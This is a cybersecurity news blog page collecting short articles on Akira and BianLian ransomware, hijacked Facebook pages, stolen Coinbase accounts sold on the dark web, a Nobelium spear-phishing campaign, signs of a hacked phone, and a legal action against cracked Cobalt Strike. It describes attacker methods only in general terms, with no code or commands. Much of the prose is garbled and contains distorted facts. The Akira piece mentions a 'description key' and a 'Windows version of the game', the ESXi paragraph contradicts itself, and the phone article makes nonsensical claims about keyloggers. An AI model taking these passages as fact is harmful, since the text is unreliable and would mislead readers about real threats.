In addition to asset managers, the gang's blog lists several victims of the gang's crimes. Akira will encrypt the files of an organization after an attack has been launched, appending the name of the encrypted files to the file names. The desktop screen will display a ransom note, explaining in a condescending tone that it is the quickest way back to the state where the company functions normally if you pay the ransom. 

The Development Bank of Southern Africa and London Capital Group are completely aware of the damage they have caused. There are many US-based companies on the gang's black web blog. 

This computer virus, known as Akira, uses double extortion techniques to pressure its victims into paying a ransom. This means that Akira copies the data before encrypting it to make sure the information can not be released, as well as selling the description key, and using these techniques to force a company into paying the ransom. 

In some cases, the ransoms amount to more than a million dollars, while in others it is less. It has focused on professional services, education, manufacturing, and research and development so far.

In sectors as diverse as education and finance, the threat of ransomware has disrupted corporate networks and encrypted stolen data from breached networks. These compromised files are marked with the extension .akira, which signifies compromise. 

It is important to note that, after the Akira ransomware has been activated, many different file extensions and names will become encrypted, as well as renamed files with the .akira extension. There will also be a ransom note titled akira_readme.txt left in each folder on the encrypted device. 

It is possible to customize how Akira works on Linux, which includes specifying the percentage of data that will be encrypted on each file, which allows threat actors to better customize their attacks. The propensity of this version of Akira to skip folders and files that are usually associated with Windows seems to indicate that it has been ported from the Windows version of the game.

Despite Akira's increasing scope, the fact that the threat now faces organizations around the world illustrates the urgency of action. Sadly, ransomware groups are increasingly expanding their operations to include Linux platforms as well. Many of them are leveraging readily available tools to do so due to the trend toward expanding their operations. To maximize their profits, they have turned this strategy into a simple and lucrative one. 

Among the most notable ransomware operations, some of which predominantly target VMware ESXi servers with their ransomware encryptors, include Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive. These operations use Linux-based encryption methods. 

Spreads Rapidly, is Widely Popular, and is Unsecured 

During a ransomware attack, servers are popular due to their ability to spread ransomware rapidly. Hackers need only one run to launch the ransomware attack, which means the ransomware attack becomes extremely fast for the first time in history. ESXi servers have gained popularity in the enterprise world, as they are among the most widely used hypervisors on the planet. Lastly, the devices do not have any security solutions installed on them, which leads to a lack of security. CrowdStrike published a report previously that focused on the fact that antivirus software simply isn't supported by the manufacturer. 

During the weekend of February 2-6, ESXi servers were targeted by thousands of attacks taking place simultaneously. The attackers were able to exploit an outdated vulnerability that had existed two years ago. As a result, good cyber security for servers is very important because research can take a long time and is not always easy. A problem that had not yet been exploited massively had been discovered by Mandiant in 2022, but the problem was still unknown.
Read more »
Ransomware
BianLian Ransomware Cyber Attacks FBI Hackers Hacking Ransomware

BianLian Ransomware has Switched to Extortion-only Attacks, FBI Confirms

 

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a joint Cybersecurity Advisory from government agencies in the United States and Australia, alerting organizations about the latest tactics, methods, and procedures (TTPs) utilized by the BianLian ransomware group. 

BianLian is a ransomware and data extortion gang that has been attacking vital infrastructure in the United States and Australia since June 2022. The advice, which is part of the #StopRansomware effort, is based on FBI and Australian Cyber Security Centre (ACSC) investigations as of March 2023. Its goal is to provide information to defenders that will help them to alter defenses and boost their security posture against BianLian ransomware and other similar threats.

BianLian used a double-extortion technique at first, encrypting systems after collecting private data from victim networks and then threatening to leak the contents. However, after Avast produced a decryptor for the ransomware in January 2023, the organization shifted to extortion based on data theft rather than encrypting systems.

This strategy remains appealing since the occurrences are essentially data breaches that result in reputation damage for the victim, impair customer trust, and present legal issues. According to CISA, BianLian compromises systems by exploiting genuine Remote Desktop Protocol (RDP) credentials obtained through first-access brokers or through phishing.

BianLian then conducts network reconnaissance using a tailored backdoor built in Go, commercial remote access tools, and command-line and scripts. Exfiltrating victim data via the File Transfer Protocol (FTP), the Rclone tool, or the Mega file hosting service is the final stage.

BianLian uses PowerShell and the Windows Command Shell to stop running processes connected with antivirus technologies in order to avoid identification by security software. The Windows Registry is also tampered with in order to defeat the tamper protection provided by Sophos security solutions.

Limiting the use of RDP and other remote desktop services, prohibiting command-line and scripting activities, and restricting the use of PowerShell on important systems are among the proposed mitigations. The alert suggests the following  methods to help defend the network:
  • Audit and control the execution of remote access tools and software on your network.
  • Restrict usage of remote desktop services like RDP and enforce stringent security measures.
  • Limit PowerShell use, update to the latest version, and enable enhanced logging.
  • Regularly audit administrative accounts and employ the principle of least privilege.
  • Develop a recovery plan with multiple copies of data stored securely and offline.
  • Adhere to NIST standards for password management, including length, storage, reuse, and multi-factor authentication.
  • Regularly update software and firmware, segment networks for improved security, and actively monitor network activity.
"FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents," as per CISA.

The full bulletins from CISA and the ACSC contain more specific information on the recommended mitigations, indications of compromise (IoCs), command traces, and BianLian approaches.
Read more »
Scam
Cyber Security Data data security Facebook Accounts Fraud Hackers Hacking Safety Scam

Verified Facebook Accounts Being Hijacked to Distribute Malware; Here's How You Can Protect Yourself

 

Hackers have been caught getting into popular verified Facebook pages and using them to distribute malware through adverts on the social media behemoth. Matt Navarra, a social strategist, was the first to notice the harmful effort, exposing the danger on Twitter. 

According to Navarra, whoever is behind the campaign targeted popular Facebook sites first (one of the victims has over seven million followers and has been active for over a decade). If they gained access, they would rename the page something like Meta (Facebook's parent company) or Google. They would then buy an ad on the social media network, targeting page managers and advertising specialists.

“Because of security issues for upcoming users, you can no longer manage ad accounts in the browser,” the ad reads. “Switch to a more professional and secure tool,” the ad concludes, before sharing an obviously fraudulent download link.

There are several issues with this campaign, according to Navarra, including how the accounts were compromised, how Facebook enabled the threat actors to change the page's name to something seemingly related to Meta while keeping the blue checkmark, and how they were able to buy and run ads that clearly redirect the target audience to a shady website at best. 

According to TechCrunch, Facebook has since disabled all of the affected accounts and shut down the malicious activities. It also stated that Facebook pages now disclose whether or not the page has changed its name in the past, and if so, from what, which is a nice move to increase openness. 

“We invest significant resources into detecting and preventing scams and hacks,” a Meta spokesperson told TechCrunch. “While many of the improvements we’ve made are difficult to see – because they minimize people from having issues in the first place – scammers are always trying to get around our security measures.”
Read more »
PrivacyAffairs
Coinbase cryptocurrency Cyber Crime Dark Web Hacking Identity Theft PrivacyAffairs

Hackers Sell Coinbase Accounts for as low as $610 on Dark Web


The emerging popularity of cryptocurrency and the convenience of online banking has resulted in an upsurge in cybercrime activities and identity fraud.

A recent research by PrivacyAffairs.com notes that hackers target social media logins, credit card numbers, and online banking logins to steal personal information worth $1,010 on the dark web.

According to an official press release released on May 1, 2023, the sale of hacked crypto accounts which is currently booming, has raised some serious concerns.

Coinbase, a cryptocurrency exchange has become a frequent target for threat actors, with stolen verified accounts worth $610 on the dark web. Users' accounts on Kraken, another well-known exchange, have also been compromised and sold online for as low as $810.

For hackers, selling compromised cryptocurrency accounts has been a profitable business, and since more people have started investing in digital assets recently, demand for these accounts has only increased. Cryptocurrencies are considered as an appealing target by hackers wanting to make a quick buck since they are mainly unregulated and decentralized.

As the value of cryptocurrencies continues to rise, it drives the hackers into stealing them. The anonymous attribute of cryptocurrencies make it challenging to locate and recover assets that have been stolen, leaving victims with limited resources.

How to Protect Oneself From Identity Theft and Hacking? 

PrivacyAffairs.com highlights the significance of raising public awareness as well as encouraging caution in order to reduce the possibility of identity theft and hacking. Online privacy should be carefully guarded by users, who should also use strong, unique passwords for each account. In addition to this, two-factor authentication is a vital tool for protecting online account.

Moreover, cryptocurrency users are advised to take extra precautions. Using cold wallets to store their virtual assets offline and avoiding sharing of their private keys or seed phrases with anyone are some of the ways that can protect you from falling prey to cybercrime activities.

The threat of cybercrime and identity fraud will only increase as the usage of digital assets and online banking grows more widespread. It is crucial that users take the required security measures to guard against hackers and other nefarious actors lurking on the dark web..

Read more »
Security
attackers Cyber Attacks Data Safety Hacking Safety Security

Russian APT Hackers Increasingly Attacking NATO Allies in Europe

 

In accordance with the Polish CERT and Military Counterintelligence Service, an ongoing cyberespionage effort linked to a Russian nation-state entity is targeting European government agencies and diplomats in order to collect Western government intelligence on the Ukraine war. According to a Thursday advisory from the two federal agencies, a campaign linked to the Russian 

APT organization Nobelium is targeting government agencies and diplomats involved with NATO and the European Union, as well as African states to a lesser extent. Per the Polish authorities, the hackers are targeting victims using spear-phishing emails that look to be from European embassies, inviting them to a meeting or event at one of the embassies.

The emails comprise malicious documents masquerading as calendar invites or meeting agendas. When victims open these files, they are sent to a hijacked website hosting a trademark Nobelium malware dropper dubbed EnvyScout, which sends malicious .img or .iso files to the victim's machine.

Nobelium previously employed malware concealed in.zip or.iso files, but in the latest operation, hackers load additionally .img files that lack the Mark of the Web feature, a security mechanism designed to prevent people from downloading harmful files. The spyware launches without informing system users.

Once executed, the malware loads additional tools previously connected with Nobelium, such as the command-and-control tool SnowyAmber and the malware downloader QuarterRig, which then exfiltrate the victim's IP address and other system information.

In accordance to the Polish CERT, hackers analyse this information to identify possible targets and evaluate whether they have turned on any antivirus or malware detection tools.
The Polish CERT stated that, in addition to European government institutions and personnel, European nongovernmental companies are also vulnerable to a Nobelium hack. The agency suggests limiting disc file mounting capabilities and enabling software constraints to prevent unprompted file execution to safeguard against hacking.

According to a recent BlackBerry Research and Intelligence report, the campaign has been active since early March and targets victims with outdated network equipment. BlackBerry believes the effort was likely begun by Russian hackers during the February visit of Polish Ambassador Marek Magierowski to the United States.

"We believe the target of Nobelium's campaign is Western countries, especially those in Western Europe, which provide help to Ukraine," BlackBerry researchers wrote.

Nobelium, also known as APT29 and CozyBear, is one of a few Russian cyber-operations groups working against Ukraine and its allies. Researchers suspect the group was also responsible for the SolarWinds supply chain hack, which was detected in December 2020.



Read more »
Hacking
Anti-Malware Cyber Crime Cyberattacks CyberCrime Cybersecurity Data Theft Hacking

What to Look For If Your Phone Is Hacked

 


More frightening is having your phone hacked if you are connected to the internet, just like any other device. It is a well-known fact that smartphones are a particularly tempting target for hackers, as they are any device with access to a large amount of personal information, from banking information to passwords to social media accounts. 

The goal of hackers is to infect your device with Trojans and malware to gain access to it. Cybercriminals monitor your activity and spy on your login data for websites and apps by installing keyloggers on your phone, protecting themselves from your privacy. Some threat actors can even turn hacked phones into cryptominers, which generate cryptocurrency for hackers. This causes the phone to run very slowly because they consume a lot of power.

Hacking a phone enables someone to access and make use of the contents of the phone. In addition, it allows its communication system. It is possible to breach security in advance or listen to your computer's internet connection if it is unsecured. Forced hacking via brute force is another possibility, as well as physical theft of your phone. Many types of phones can be exploited, including Androids and iPhones, and these can all be at risk of being hacked. 

The mobile environment is susceptible to many threats, including malware apps, adware, and spyware. Mobile malware apps and modified versions of existing applications masquerade as genuine gaming applications, crypto mining apps, and messaging applications. They collect account login information, charge users fees for bogus services, and sign them up for premium text services. This is according to the McAfee 2022 Mobile Threat Report. 

As one of the most prevalent types of malware today, the spyware monitors a device's content. It encourages users to share their internet bandwidth, uses botnets to send spam, and captures users' login details when entering them into compromised legitimate apps. As a result of phishing emails and texts regarding phishing links, as well as malicious websites, malware is often downloaded unintentionally and without the user's knowledge. 

Whenever a criminal enters your phone, they gain access to every part of it without you even realizing they have access to it. The text, email, app, contacts, photos, recordings, and videos involved include your private texts. 

An attacker can gain physical access to your phone by physically compromising it through several means. These include malware-loaded charging ports, unlocking your phone, using unsecured Wi-Fi connections, swapping SIM cards, opening Bluetooth connections, and even software weaknesses that could allow a hacker to enter the device. 

Hacking software can cause problems in several ways. This is whether it is physically installed on your phone by hackers or through methods like scammers, phony apps, sketchy websites, and phishing attacks. Here is how it can trouble you: 

Keylogging: When hackers get hold of keylogging, they can use it as a stalking tool that records your phone conversations, the type of text you type, and even the volume you speak to someone.   

In the world of malware, Trojans are a type of malware that can be disguised inside your phone to obtain sensitive information from it. This includes passwords or personal information from your credit card account.  

Like Trojan horses, cryptominers hide on the host machine and operate in the background. After that, it harnesses the device's computing power to mine cryptocurrency using its computing power. Although crypto mining is not illegal in law, it is illegal to "crypto jack" a device without the owner's consent. 

Signs That Prove Your Phone is Hacked

Popups on the screen randomly 

If your device has been hacked, this could be the easiest way to find out if it has been compromised. Your device is compromised by the hacker and he informs you of that fact. These can appear on your main screen, on your apps, or in your browser while you use your phone. 

Unrecognizable apps downloaded or used 

Whenever you notice that you start seeing apps or files on your home screen or subfolders that you have never downloaded before, you might be the victim of a hack. 

Uninitiated calls, texts, or emails from your phone 

There is a possibility that you have been hacked if you see calls or texts you did not make or send out. A robocall spoofing your number could be the cause of this. In the case of incoming emails and text messages, however, the hacker who controls your phone remotely is most likely targeting your phone remotely.

Data usage is high 

To confirm if your phone has been hacked, you should not change the way you use it recently. The fact that your phone seems to consume excessive data may be caused by a hack. Data is often sucked back into hacker possession by malware, spyware, or viruses to increase the effectiveness of their service. 

Battery drainage 

As long as you are using the phone normally and have not made any recent changes to the software for your operating system, such as updating your operating system, you should be fine. Your phone may have been hacked. If, however, the battery drains faster than usual. A phone's simple operating system is heavily dependent upon the power consumed by malware, spyware, and viruses that run in the background on the phone. 

Apps open and close without warning 

There should be no issues with your apps opening, closing, or malfunctioning unless you have not updated your operating system or apps. 

The operating system and other legitimate apps can sometimes become unresponsive due to malware, viruses, and spyware. 

How to stop someone from hacking your phone 

Delete suspicious apps 

There are many ways to install malware on your phone when downloading a suspicious app from the app store. 

Ensure that any apps you have recently downloaded were developed by a reputable developer and rated positively by users. Do not keep them on your phone if they do not meet your requirements. 

Run anti-malware software 

A popular piece of software that detects and targets malware hiding on your mobile device is called anti-malware software. It is recommended that you run this regularly, but if you have not done so before, now would be a good time to start doing it. 

Reset your phone 

With a factory reset of your phone, you can remove most malware from your device. However, the action will wipe all data stored on your device, including photos, notes, and contacts, which will be irrevocable. Backing up your device's data is very critical before resetting it and is a must.

The presence of malware, spyware, or viruses in the background can hide in plain sight. This can compromise enough data to remain unnoticed for some time.
Read more »
Tools
Cyber Security Data Hackers Hacking Safety Security Tools

Microsoft & Fortra Seeks Court Order to Remove a Ransomware Hacking Tool Targeted Hospitals

 

A number of cybersecurity businesses, including Microsoft, launched a full-scale legal crackdown on one of the primary hacking tools used by malware criminal groups in their operations. Microsoft, Fortra, and the Health Information Sharing and Analysis Center (H-ISAC) announced a broad legal strategy to combat malicious versions of Fortra's Cobalt Strike and Microsoft's software development kits. 

Cobalt Strike is a popular penetration testing program that allows businesses to evaluate their security defenses prior to an assault. Malicious hackers, on the other hand, have used a hacked version of the tool for years to execute devastating ransomware attacks and other issues.

In November 2021, the Department of Health and Human Services issued a warning to healthcare organizations that both state-backed hackers and cybercriminal groups were using the technique in their attacks. The now-defunct Conti ransomware group sought to utilize Cobalt Strike to implant malware on Ireland's publicly funded healthcare system the same year.

On Friday, the United States District Court for the Eastern District of New York granted the organizations a court order authorizing them to confiscate domain names where hostile actors had been storing and disseminating malicious copies of Cobalt Strike.

The court ruling permits Microsoft, Fortra, and the H-ISAC to automatically inform and deactivate IP addresses in the United States that are hosting tainted versions of these tools. These takedowns will begin immediately, and the court order permits for more takedowns when criminals build new infrastructure.

On Thursday, Microsoft will also alert hosting providers in Latin America and the European Union about domain names suspected of hosting infected copies of Cobalt Strike.
Microsoft and Fortra were also granted a temporary restraining order against anyone who violated their programmes' copyright, making it easier for them to confiscate and shut down rogue versions of the software.

It is uncommon for private corporations to use the judicial system on their own to pursue dangerous hackers. While Microsoft has previously used a court order to take down specific groups, today's steps are the company's first at targeting specific tools used by a diverse spectrum of individuals.

"This is something that we jokingly call an advanced persistent disruption; it is not going to be done on Thursday," Amy Hogan-Burney, general manager and associate general counsel for cybersecurity policy and protection at Microsoft, told Axios.

Cybercriminals are frequently adaptable, and they have been quick to rebuild their networks following past law enforcement crackdowns.

After all of the attention devoted to Cobalt Strike, Microsoft has already begun examining tools that they expect bad actors would turn to next, according to Hogan-Burney.
Read more »
Subscribe to: Posts (Atom)